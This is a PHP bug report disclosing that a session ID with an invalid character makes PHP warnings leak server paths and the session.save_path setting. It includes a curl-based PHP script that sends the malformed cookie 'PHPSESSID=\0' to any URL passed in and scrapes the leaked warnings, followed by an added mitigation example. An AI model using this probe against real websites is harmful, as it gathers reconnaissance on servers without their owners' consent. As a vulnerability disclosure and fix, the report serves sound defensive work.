From:             astalor at gmail dot com
Operating system: ALL
PHP version:      5.2.4RC1
PHP Bug Type:     Session related
Bug description:  Information disclosure when using invalid symbol in the
session id

Description:
------------
If you put an invalid symbol in the session ID and PHP warnings are turned
on, you can retrieve information about files and paths on the server and
also, in some cases, the configured session.save_path variable from PHP.INI.
This can display warnings (and sometimes break pages that count on
redirection with header()) on pages that are perfectly correct and without
any errors in them.

Reproduce code:
---------------
<?php
/* This script checks if PHP warnings are enabled for the targeted website */
function checkWarnings($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 2);
        // Cookie carrying a session ID with an invalid symbol
        curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=\0");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        $output = curl_exec($ch);
        curl_close($ch);

        // Collect every warning line printed into the response
        preg_match_all("/<b>Warning<\/b>:(.*)<br \/>/i", $output, $match);
        // Capture the session.save_path value shown in the write-failure warning
        preg_match_all("/session.save_path is correct \((.*)\)/i", $output, $path);
        #echo $output;
        echo "<pre>";
        echo "Checking <b>$url</b>\n";
        if (count($match[0]) > 0) {
                echo "<b>Warnings found</b>:\n";
                echo implode("\n", $match[0]);
        } else {
                echo "Warnings are <b>disabled</b>\n";
        }
        // Optionally dump the whole response (?debug=1)
        if (isset($_GET['debug']) && $_GET['debug'] == 1) {
                echo "<b>Displaying page:</b>\n";
                echo $output;
        }
        #print_r($path);
}
checkWarnings($_GET['url']);
?>

Expected result:
----------------
Warning:  session_start() [function.session-start]: The session id
contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in
/home/user/public_html/main/file.php on line 32
Warning:  Unknown: Failed to write session data (files). Please verify
that the current setting of session.save_path is correct (/tmp) in Unknown
on line 0


Actual result:
--------------
The same as the expected result, as long as PHP warnings are enabled.

-- 
Edit bug report at http://bugs.php.net/?id=42310&edit=1
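One way an application can keep the warnings described in this report out of its responses, as an added example that is not part of the original report or of PHP itself: it turns off on-page error display and replaces a malformed client-supplied session ID before session_start() runs. The helper names isValidSessionId() and startSessionSafely() and the 128-character length cap are assumptions, and random_bytes() requires PHP 7 or later.

```php
<?php
// Added example, not from the bug report. Assumes PHP 7+ for random_bytes().

// Keep warning text (file paths, session.save_path) out of HTTP responses;
// send it to the server error log instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

/**
 * Hypothetical helper: true if $id uses only the characters the warning
 * in the report lists as valid (a-z, A-Z, 0-9, '-' and ',').
 * The 128-character cap is an assumption of this example.
 */
function isValidSessionId($id)
{
    return is_string($id) && preg_match('/\A[a-zA-Z0-9,-]{1,128}\z/', $id) === 1;
}

/**
 * Hypothetical helper: start the session, replacing a malformed
 * client-supplied ID so session_start() never sees it.
 */
function startSessionSafely()
{
    $name = session_name();
    if (isset($_COOKIE[$name]) && !isValidSessionId($_COOKIE[$name])) {
        // Record the event for detection without echoing the raw value.
        error_log('Rejected malformed session ID from '
            . (isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : 'unknown'));
        // An explicitly set ID takes precedence over the cookie value.
        session_id(bin2hex(random_bytes(16)));
    }
    return session_start();
}

startSessionSafely();
```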